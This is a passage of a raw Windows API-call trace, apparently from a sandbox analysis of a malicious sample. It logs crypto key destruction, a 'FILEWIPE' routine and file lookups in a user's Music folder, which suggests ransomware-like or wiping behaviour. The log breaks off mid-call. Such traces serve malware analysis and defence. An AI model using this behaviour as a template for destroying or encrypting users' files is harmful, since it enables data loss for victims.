(in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.582] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.582] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.582] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.582] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.582] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.582] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.583] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0186.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0186.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.587] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.587] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.587] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0186.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.608] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.648] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0186.648] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0186.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.648] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.649] CryptDestroyKey (hKey=0x90af98) returned 1 [0186.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0186.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0186.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0186.649] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.649] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.650] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.650] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.650] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0186.650] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0186.650] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.650] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0186.650] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.650] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.650] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.650] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.650] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.650] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.650] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.650] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.650] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.651] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0186.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.651] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.651] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.651] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.651] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0186.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.651] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.651] FreeLibrary (hLibModule=0x74f20000) returned 1 [0186.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.652] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.654] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.658] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.658] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0186.658] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.659] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.659] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd34cb0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x4145b680, ftLastAccessTime.dwHighDateTime=0x1d5de2d, ftLastWriteTime.dwLowDateTime=0x4145b680, ftLastWriteTime.dwHighDateTime=0x1d5de2d, nFileSizeHigh=0x0, nFileSizeLow=0x7b69, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="y3qZNbvqKQ2uR4UOsf8q.wav", cAlternateFileName="Y3QZNB~1.WAV")) returned 0x90af58 [0186.660] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0186.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.661] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.661] CharLowerBuffW (in: lpsz="byte[31593]", cchLength=0xb | out: lpsz="byte[31593]") returned 0xb [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.663] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.663] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.664] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.664] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.665] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0186.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0186.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c28e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.666] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.667] HeapFree (in: hHeap=0x8a0000, 